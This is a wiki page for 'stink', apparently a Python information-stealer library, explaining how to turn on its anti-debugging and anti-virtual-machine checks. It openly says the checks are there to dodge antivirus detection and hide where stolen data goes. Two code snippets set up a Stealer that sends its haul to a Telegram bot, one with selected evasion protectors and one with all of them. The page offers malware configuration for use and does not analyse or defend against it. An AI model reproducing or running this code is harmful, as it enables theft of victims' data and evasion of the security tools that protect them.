Anti‐debugging and anti‐virtual‐machine
Astaroth edited this page Nov 1, 2023
·
8 revisions
In stink
there is a module to check PC to virtual machine and if there are any running debug applications before starting. If they are detected, stink
terminates its work. This will help to get fewer detections from antiviruses, as well as hide where the data goes.
- By default, all checks are disabled. You can specify certain ones if necessary:
from stink import Stealer, Senders, Protectors
if __name__ == '__main__':
Stealer(
senders=[
Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
],
protectors=[
Protectors.processes,
Protectors.virtual_machine
]
).run()
- You can also enable all checks:
from stink import Stealer, Senders, Protectors
if __name__ == '__main__':
Stealer(
senders=[
Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)
],
protectors=[
Protectors.all
]
).run()
- You can add additional usernames, MAC addresses, etc. to the blacklist in the
ProtectorConfig
class in the filestink/helpers/config.py
: